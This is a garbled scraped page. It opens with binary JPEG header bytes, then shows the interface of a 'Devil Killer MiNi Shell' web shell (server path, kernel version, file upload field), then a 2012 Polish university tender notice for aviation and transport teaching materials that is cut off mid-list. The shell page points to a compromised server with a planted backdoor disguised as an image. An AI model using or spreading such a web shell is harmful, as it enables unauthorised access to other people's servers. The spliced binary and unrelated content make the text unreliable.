JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120511/105679-N-2012.html

<p class="kh_header"><b>Gliwice: Opracowanie materiałów dydaktycznych dla studentów nowego kierunku, nowych specjalności i słuchaczy kursów specjalistycznych. Oznaczenie sprawy: OZ/U/24/OB/12</b><br>
<b>Numer ogłoszenia: 105679 - 2012; data zamieszczenia: 11.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Śląska , ul. Akademicka 2A, 44-100 Gliwice, woj. śląskie, tel. (032) 237 13 34, 2371335, faks 0322371334, 2372255, 2372660.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie materiałów dydaktycznych dla studentów nowego kierunku, nowych specjalności i słuchaczy kursów specjalistycznych. Oznaczenie sprawy: OZ/U/24/OB/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie materiałów dydaktycznych dla studentów nowego kierunku, nowych specjalnościach i słuchaczy kursów specjalistycznych. Przedmiot zamówienia został podzielony na 15 zadań obejmujących odpowiednio opracowanie materiałów dydaktycznych do przedmiotów: Procedury operacyjne I, Procedury operacyjne II, Prawo lotnicze z procedurami ATC I, Prawo lotnicze z procedurami ATC II, Obiekty zaplecza technicznego motoryzacji, Inżynieria ruchu drogowego, Planowanie potoków ruchu,Techniki symulacyjne w sterowaniu ruchem drogowym, Systemy telematyki i zarządzania transportem, Międzynarodowy standard branży lotniczej IRIS, Przetwarzanie i wizualizacja danych przemysłowych, Serwery bazodanowe, Zintegrowane systemy zarządzania, Komputerowa analiza obrazu, Systemy inteligentne i decyzyjne transportu.
2. CPV 80.00.00.00-4- usługi edukacyjne i szkoleniowe.
3.Termin realizacji (dotyczy wszystkich zadań): od dnia podpisania umowy do 30.09.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie minimum 1 osobą zdolną do wykonania zamówienia, która będzie odpowiedzialna m. in. za prawidłową realizację zamówienia, a ponadto posiada:
-co najmniej tytuł zawodowy mgr z dyscypliny zgodnej z tematyką opracowywanych materiałów dydaktycznych;
-doświadczenie w prowadzeniu co najmniej przez 2 semestry zajęć dydaktycznych w szkole wyższej z dyscypliny zgodnej z tematyką opracowywanych materiałów dydaktycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Wymagania dotyczące przedmiotu zamówienia jakie musi spełnić Wykonawca: 1.Zaoferowanie ceny, terminów, warunków realizacji zamówienia.
B) Wymagane dokumenty i załączniki potwierdzające spełnianie wymagań 
dotyczących przedmiotu zamówienia: 1.1. Oferta Cenowa.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów, o których mowa w pkt. III.3.4) niniejszego ogłoszenia - jeżeli dotyczy. 2) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w III 4.3 niniejszego ogłoszenia, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 3) Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, za wyjątkiem dokumentów, których złożenie Zamawiający dopuścił w języku obcym. 4) Ww. dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (czytelny podpis upoważnionego przedstawiciela lub imienna pieczątka z parafą) tj. przez osoby reprezentujące Wykonawcę lub przez pełnomocnika upoważnionego do złożenia oferty w jego imieniu. Sposób reprezentacji musi być zgodny z właściwym wypisem z rejestru. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz w przypadku innych podmiotów (oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przez Wykonawcę przy wykonywaniu zamówienia) kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów powinny być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty. 5) W przypadku składania oświadczeń lub podpisywania jakichkolwiek dokumentów przez PEŁNOMOCNIKA wymagane jest dołączenie oryginału pełnomocnictwa z podpisem mocodawcy lub kopii uwierzytelnionej notarialnie. 6) Wykonawcy mogą wspólnie ubiegać się o udzielenia zamówienia. W tym przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do tych Wykonawców. Należy dołączyć do oferty stosowne pełnomocnictwo do reprezentowania podmiotów występujących wspólnie w postępowaniu o udzielenie zamówienia; pełnomocnictwo to powinno być udzielone (podpisane) przez podmioty występujące wspólnie. Jeżeli oferta Wykonawców, występujących wspólnie zostanie wybrana, Zamawiający (przed zawarciem umowy) może żądać umowy regulującej ich współpracę. 7) Zamawiający nie wymaga, aby Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji zamówienia, przedkładał także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy, określonym w pkt III.4.2) niniejszego ogłoszenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Nie będą możliwe istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem następujących przypadków: 
1.	zmiany terminu realizacji zamówienia ze względu na:
- przyczyny leżące po stronie Zamawiającego
- inne niezawinione przyczyny spowodowane przez tzw. siłę wyższą np. pożar, zalanie itp. 
2.	poprawy jakości lub innych parametrów charakterystycznych dla danego elementu usługi, 
3.	zmiany w kolejności i terminach realizacji zamówienia, zmiany w kolejności i terminach płatności (w tym płatności częściowe - jeżeli dotyczy) za realizację zamówienia w sytuacji, kiedy są one korzystne dla Zamawiającego,
4.	zmiany kluczowego personelu Wykonawcy lub Zamawiającego (osoby upoważnione do reprezentowania stron w sprawach związanych z realizacją zamówienia),
5.	zmiany zakresu zamówienia wykonywanego przy pomocy podwykonawców (w przypadku zadeklarowania przez Wykonawcę realizacji zamówienia przy pomocy podwykonawców),
6.	obniżenie ilości/wielkości przedmiotu zamówienia i tym samym wynagrodzenia Wykonawcy, wynikające z zaistnienia obiektywnych przesłanek konieczności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.polsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44 - 100 Gliwice ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 08:30, miejsce: Politechnika Śląska, Dział Zamówień Publicznych i Zaopatrzenia, 44 - 100 Gliwice ul. Konarskiego 18, pok. 511.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Przedmiot zamówienia jest finansowany na podstawie umowy UDA - POKL.04.01.01-00-386/09-00 z dnia 4.12.2009r. Otwarcie nowego kierunku studiów i nowych specjalności oraz organizacja specjalistycznych kursów w Politechnice Śląskiej wraz z systemem staży dla kadry akademickiej uczelni. Projekt realizowany w ramach Europejskiego Funduszu Społecznego Priorytet IV, Działanie 1, Poddziałanie 1 Program Operacyjny Kapitał Ludzki.
2.Zamawiający zobowiązuje się dokonać zapłaty należności na rachunek Wykonawcy podany na fakturze VAT/rachunku w terminie do 30 dni od daty wystawienia faktury/rachunku i spełnienia warunków umowy. 
3.Faktura VAT/rachunek zapłacona zostanie z konta Zamawiającego tj. z konta Projektu:  ING Bank Śląski S.A. w Katowicach nr 79 1050 1230 1000 0023  4458 2172..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - opracowanie materiałów dydaktycznych do przedmiotu Procedury operacyjne I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych I i II stopnia nowej specjalności Nawigacja powietrzna kierunku Transport.

2.Szczegółowy zakres materiałów dydaktycznych:
-procedury JAR-OPS
-specjalne procedury operacyjne oraz zagrożenia
-procedury dolotowe i odlotowe
-obliczanie procedur
-procedury antyhałasowe
-uskok wiatru
-procedury lotniskowe 
-operacje w porcie lotniczym 

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 8  arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - opracowanie materiałów dydaktycznych do przedmiotu Procedury operacyjne II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych I i II stopnia nowej specjalności Nawigacja powietrzna kierunku Transport.

2.Szczegółowy zakres materiałów dydaktycznych:
-turbulencja w śladzie aerodynamicznym
- przewóz materiałów niebezpiecznych
-operacje przy ograniczonej widoczności
-operacje w porcie lotniczym 
-bezpieczeństwo w ruchu lotniczym 
-badanie wypadków lotniczych

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętość  8 arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - opracowanie materiałów dydaktycznych do przedmiotu Prawo lotnicze z procedurami ATC I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych I i II stopnia nowej specjalności Nawigacja powietrzna kierunku Transport.

2.Szczegółowy zakres materiałów dydaktycznych:
-Służby ruchu lotniczego (załącznik 11 ICAO, Doc 4444).
-Służba informacji lotniczej (załącznik 15 ICAO).
-Służba lotniska ( załącznik 14ICAO,tom 1 i 2).
-Ułatwienie dla międzynarodowego transportu lotniczego (załącznik 9ICAO).
-Poszukiwanie i ratownictwo (załącznik 12ICAO).
-Bezpieczeństwo i zabezpieczenie międzynarodowego lotnictwa cywilnego przed aktami bezprawnego. działania(załącznik 17ICAO).
-Badanie wypadków statków powietrznych (załącznik 13ICAO).
-Krajowe prawo lotnicze.
-Międzynarodowe  porozumienie i organizacja, zdalność statku powietrznego do lotu(załącznik 8 ICAO).

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 8 arkuszy wydawniczych, tj. ok. 144 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 - opracowanie materiałów dydaktycznych do przedmiotu Prawo lotnicze z procedurami ATC II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych I i II stopnia nowej specjalności Nawigacja powietrzna kierunku Transport.

2.Szczegółowy zakres materiałów dydaktycznych:
-Przynależność państwa statku powietrznego do lotu. 
-Międzynarodowe konwencje prawa lotniczego.
-Podstawowe dokumenty lotnicze.
-Podział przestrzeni powietrznej.
-Służby ruchu lotniczego. 
-Dokumentacja niezbędna do wykonania lotu.

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 6 arkuszy wydawniczych, tj. ok. 108 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 - opracowanie materiałów dydaktycznych do przedmiotu Obiekty zaplecza technicznego motoryzacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych II stopnia nowej specjalności Technika i zarządzanie w transporcie samochodowym kierunku Transport.

2.Szczegółowy zakres materiałów dydaktycznych:
-charakterystyka prac obsługowo-naprawczych związanych z eksploatacją samochodów
-rodzaje obiektów obsługo-naprawczych
-stanowiska obsług technicznych i napraw pojazdów
-stacje kontroli pojazdów 
-myjnie samochodowe 
-stanowiska naprawy ram i nadwozi
-stanowiska lakierowania
-charakterystyka instalacji technicznych w obiektach obsługowo-naprawczych
-instalacje wentylacji
-odciągi spalin 
-instalacje sprężonego powietrza
-etapy projektowania obiektów obsługowo-naprawczych
-obliczenia podstawowych parametrów obiektów
-ilość stanowisk 
-stanowiska parkingowe i place manewrowe
-dobór typów stanowisk
-dobór podstawowego wyposażenia stanowisk 
-wpływ obiektów obsługowo -naprawczych na środowisko naturalne
-przykłady aranżacji obiektów

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 10 arkuszy wydawniczych, tj. ok. 180 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6 - opracowanie materiałów dydaktycznych do przedmiotu Inżynieria ruchu drogowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych II stopnia nowej specjalności Systemy informatyczne transportu kierunku Transport. 

2.Szczegółowy zakres materiałów dydaktycznych:
-Człowiek jako centralny element systemu: człowiek-pojazd-droga.
-Cechy pojazdów ze względu na bezpieczeństwo ruchu. Manewry pojazdów na odcinkach i skrzyżowaniach.
-Podział sieci ulicznej na elementy jednorodne w analizach zdarzeń drogowych. 
-Kolizyjność i przejezdność skrzyżowania. 
-Wyznaczanie odległości widoczności na różnorodnych elementach sieci drogowej. 
-Typy i parametry techniczne rond. Wyznaczanie przepustowości rond.
-Parametry ruchu drogowego. Podstawowe równanie ruchu drogowego i jego wykres. 
-Podstawowe cechy metody HCM. 
-Wyznaczanie przepustowości skrzyżowań bez sygnalizacji świetlnej z szerokim pasem dzielącym,
-Metody wyznaczania przepustowości skrzyżowań bez sygnalizacji świetlnej. 
-Miary efektywności ruchu na skrzyżowaniach z sygnalizacją świetlną. 
-Klasyfikacja modeli ruchu drogowego i ich charakterystyka. 
-Podstawowe charakterystyki ruchu pieszego. Parametry urządzeń dla pieszych. 
-Charakterystyka ruchu rowerowego. Klasy dróg rowerowych. 

Całość opracowanych  materiałów dydaktycznych nie przekroczy objętości 10 arkuszy wydawniczych, tj. ok. 180 standardowych stron tekstu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7 - opracowanie materiałów dydaktycznych do przedmiotu  Planowanie potoków ruchu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje opracowanie materiałów dydaktycznych dla studentów studiów stacjonarnych II stopnia nowej specjalności Systemy informatyczne transportu kierunku Transport. 

2.Szczegółowy zakres materiałów dydaktycznych:
-Wykorzystanie teorii grafów do opisu struktury systemu transportowego.
-Potok ruchu w sieci transportowej.
-Zasady organizowania i organizacji ruchu w sieciach transportowych.
-Koszt przewozu i jego składniki.
-Pełne odwzorowanie ruchu w sieci transportowej.
-Modele generowania ruchu w obszarach miejskich.
-Modele rozkładu przestrzennego ruchu oraz modele podziału zadań przewozowych na środki transportu, 
-Statyczne metody rozkładu podróży na sieć transportową wykorzystywane w transporcie indywidualnym i zbiorowym.
-Charakterystyka transportu miejskiego, jakość i standardy w transporcie miejskim.
-Metody pozyskiwania danych dla potrzeb modelowania ruchu, techniki i metody badań potrzeb przewozowych.
-Kompleksowe Badania Ruchu.
-Niebieska Księga dla projektów i inwestycji związanych z infrastrukturą drogową.
